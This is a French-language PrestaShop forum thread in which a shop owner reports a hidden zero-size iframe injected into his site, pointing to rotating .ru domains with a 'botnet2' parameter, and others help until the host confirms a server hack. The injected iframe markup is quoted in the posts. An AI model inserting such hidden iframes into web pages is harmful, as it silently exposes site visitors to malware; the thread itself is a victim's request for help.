[RESOLU] Pub non désiré sur ma boutique iframe http://yafzvancybuwmnno.ru/runforestrun

[djedje93]

Bonjour a tous,

 

Désolé si un tel sujet existe déjà mais depuis une semaine je ne trouve pas de réponse.

 

Voila je m'explique

 

Quand on va sur ma boutique (http://www.france-luxury.com) il y a une Iframe non désiré de 4px .

 

<iframe src="http://yafzvancybuwmnno.ru/runforestrun?sid=botnet2" style="width: 0px; height: 0px; visibility: hidden; "></iframe>

 

Alors bon elle ne me dérange pas vraiment mais si vous utilisé Google Chrome il vous dit que le site "

Avertissement : Un problème a été détecté sur cette page."

 

 

et ensuite une fois que l'on va sur le site (je prend le risque ;-)

 

 

j'ai pensé au template mais même si j'en change cela reste

 

ce qui m’embête c'est que le client risque de ne pas venir sur le site .

 

je vois cette iframe partout

 

Je vous remercie d'avance de votre aide .

 

Jérémy

Edited July 8, 2012 by djedje93 (see edit history)

[yvon38]

Bonjour,

Ce problème est sérieux et je sais de quoi je parle j'ai passé le vendredi avec mon serveur à régler cette "plaisanterie", un ( ou plusieurs ) petit(s) malin(s) distribue des mails sous forme d'ip du style http:// xxxxxxx...contanant un logiciel malveillant afin de récupérer vos mots de passe,

il y a plusieurs causes possibles:

-En premier lieu êtes vous chez Orange ?

Edited July 7, 2012 by yvon38 (see edit history)

[yvon38]

RE :

-vous recherchez l'adresse htp://yafzvancybuwmnno.ru sur votre PC et la virez si elle est présente ( j'ai volontairement enlevé un t à http )

-Vous scannez minutieusement votre pc pour rechercher les infections.

-Vous enlevez ce lien dans votre site, si ce n'est pas possible faites une restauration avec une sauvegarde de votre site ( sauvegarde que vous effectuez régulièrement je vous le souhaite .

-Vous changez tous les mots de passe de votre site car l'intru a pu pénétrer votre site : hébergeur, ftp, accès, etc...

-Enfin selon votre hébergeur demandez lui une restauration de vos fichiers antérieurs...

-Prenez cette intrusion au sérieux car l'intru fait désormais ce qu'il veut sur votre site : pub, destruction, détournement, etc....

Bon courage....

[djedje93]

Bonjour

 

déjà merci de votre réponse

 

le problème est que je ne sais pas a partir de quand j'ai eu ceci.

 

j'ai passé mon vendredi et une grande parti de la nuit a chercher

 

Je ne trouve pas ou cela peut être quel fichier de presta il faut retirer.

 

le nom du site a encore changé : <iframe src="htp://bhujzorkulhkpwob.ru/runforestrun?sid=botnet2" style="width: 0px; height: 0px; visibility: hidden; "></iframe> (le t en plus bien sur ;-)

 

j'ai tout refait changer tous les mdp même le nom de la base de donnée.

 

et ce matin c'est revenu avec une autre url mais il est encore la

 

Je ne suis pas chez Orange mon pc est sain.

 

quelqu'un aurais une idée.

Edited July 7, 2012 by djedje93 (see edit history)

[yvon38]

RE :

Je ne suis pas chez Orange mon pc est sain.

-Vous avez un logiciel espion installé sur votre PC, alors ne croyez surtout pas que votre PC soit sain !!!! à part vous qui pourrait accéder à votre site ? posez vous la question ! Car avant de chercher à enlever cette pub sur votre site comment est-elle rentrée si ce n'est pas vous qui l'avez installée, votre hébergeur ?

-A partir de votre panneau de configuration recherchez cet intru ( qui vient de russie : bhujzorkulhkpwob.ru ) dans vos programmes,

- essayez avec la commande exécutez,afin de trouver un logiciel inconnu .

-Voyez aussi dans votre base de registre : msconfig

-Avez vous toujours cette page d'avertissement de Google ? avez vous contacté votre hébergeur ?

 

-En conclusion il vous faut vous débarrasser de ce virus; d'autant plus que vous risquez de vous faire pirater votre système de paiement et des problèmes autrement plus sérieux pourraient se présenter, le problème vient de votre pc et non pas de PS, comme déjà dit vous enlèverez ce lien plus tard en communiquant le lien de votre site si possible pour voir où est situé ce lien.( utilisez debug )

 

PS.Je vous conseille vivement de fermer votre boutique tant que vous n'avez pas réglé ce problème car, je me répète, mais vous risquez les pires ennuis au niveau des paiements !

Edited July 7, 2012 by yvon38 (see edit history)

[yvon38]

RE : encore une question :

avez vous restauré vos fichiers ?

[djedje93]

Hello Yvon38,

 

Après recherche sur mon Pc base de registre et tout rien n'est trouvé.

 

C'est un Pc du boulot verrouiller et scanner tous les jours ( c'est mon métier l'expertise applicatif informatique ;-)

 

Deplus l'install à été fait puis restauration de la base de donner et c'est à partir de la que le pb est revenu.

 

Donc je pense vraiment que le problème est que sur le site et non en local

 

Je relance un scann maintenant et reviens vers vous après

[yvon38]

RE :

C'est un Pc du boulot verrouiller et scanner tous les jours

Vous n'êtes donc pas le seul à vous en servir ?

c'est mon métier l'expertise applicatif informatique

Alors l'utilisation de DEBUG ( ou similaire ) doit vous être familière afin de repérer le fichier dans lequel ce lien est incrusté et ensuite le détruire....

[DeyDDy]

Bonjour,

 

Voici une adresse pour analyser votre boutique ici et trouver exactement quel fichier sont toucher

 

J'ai récemment été pirater et beaucoup de fichier toucher avec des redirections en tout genre

 

Vérifiez votre fichier htaccess dans un premier temps

[djedje93]

hello,

 

je sèche .....

 

après plein de recherche et bien je ne trouve toujours pas d'ou cela viens

 

j'ai fait une rechercher sur mon poste rien aucun virus

base de registre il ne trouve rien non plus

 

autre test :

 

depuis un poste refait a zéro

installe de prestashop 1.4.8 neuf

je re injecte la base de donné et les photos et le theme .

 

et la la merde reviens .

 

Une autre idée car la c'est du corsé ;-)

 

Jérémy

[yvon38]

RE : il faut se rendre à l'évidence qu'un antivirus ne détectera pas forcément un logiciel espion comme une infection, avez vous contacté graphileom qui a établi votre thème et enfin où se trouve exactement cette i-frame sur le site ? je tourne en rond sur votre site et ne vois rien ....

[djedje93]

Bonsoir,

 

Avez vous Google chrome ?

 

Si oui sur l'index de mon site faite un ctrl maj i. ( moyen mémo technic contrôle magic ;-) et en bas du site on vois l'iframe.

2 eme photo de mon premier poste.

 

Sinon je suis complètement fou x(

 

Bonne nuit j' peux plus de chercher je reprends demain matin

 

Merci de ton aide en tout cas

 

Jeremy

[yvon38]

désolé mais sur chrome faudrait me ré-expliquer la manip en détail car je n'ai rien vu qui ressemble à votre photo...

[yvon38]

RE : je confirme que je ne vois AUCUNE frame sur mon écran de 21 " ( dessous du n de "contactez nous" ), pas plus que sur mes 2 autres pc.....j'ai recherché toutes les iframes -->rien trouvé, vous ne l'avez pas en dehors de votre site ?

[Studio Créations]

Déjà eu ce type de problème il y a quelques années, du à la base dans une faille de OS commerce, qui avait pu accéder à tous les dossiers du serveur.

 

Tu as autre chose d'installé que Presta?

[djedje93]

Hello All,

 

Yvon : Pour controlé une page sur Chrome je fait Ctrl+Maj+I

cela ouvre le control sur la page en cours.

Mais si tu trouve rien je commence vraiment a croire que c'est ma machine mais pourtant je fais plusieurs site récement et c'est le seul avec ce problème .

 

Studio Creation : non c'est la seul chose installé sur l'hebergement, mais c'est du mutualisé donc je ne sais pas ce que font les autre ;-)

 

J'ai demandé a mon hebergeur de faire un scan sur le serveur pour voir s'il ne trouve rien .

 

je vous tiens au courant .

 

Jérémy

[djedje93]

voila la réponse

 

Je pouvais toujours chercher lol : reponse de mon hebergeur :

------------------

Bonjour,

Suite à une intrusion sur un de nos serveurs et à l’installation d’un hack,

Notre service technique a nettoyé l’ensemble des pages web (.php .html .htm et .js).

Pour éviter une propagation de ce problème à l’ensemble de nos machines nous avons réinitialisé tous les mots de passe des comptes client, FTP et boites mails de nos clients.

[yvon38]

RE : bonjour,

Je suis heureux que tout se termine bien, ce petit pixel ne m'est apparut que sous IE avec les mêmes conséquences que sous chrome.

Mais quand même, à la relecture de mes posts :

-Enfin selon votre hébergeur demandez lui une restauration de vos fichiers antérieurs...

-Avez vous toujours cette page d'avertissement de Google ? avez vous contacté votre hébergeur ?

Cela aurait pu faire gagner du temps à tout le monde, ....vous ayant dit que j'avais eu un problème semblable la veille et pour compléter la réponse de votre hébergeur est pratiquement la même que celle du mien : levillage.org

J'écris cela essentiellement pour ceux qui liront ce post par la suite le but du forum étant l'entraide.

Bonne continuation.

PS. N'oubliez pas de mettre votre post en "RESOLU"

[djedje93]

Je suis d'accord avec toi mais la restauration avais été demander et faite vendredi mais cela n'avais pas solutionner le pb et pour cause.

 

En tout cas merci de votre aide

 

Jeremy

[GoldRazor]

Le piratage provient d'une variable non protéger sur ton site. Ca leur permet d'installer un dossier sur ton FTP avec des scripts malicieux. Met à jour ton prestashop et supprime sur ton FTP le dossier installé par les pirates ou les pc zombis

 

++

Edited July 8, 2012 by Kevin789 (see edit history)

[yvon38]

SVP :Mettez le post en résolu pour la bonne marche du forum..

[djedje93]

C'est fait mais depuis l'iphone je n'y arrivais pas ;-)

 

Merci encore de votre aide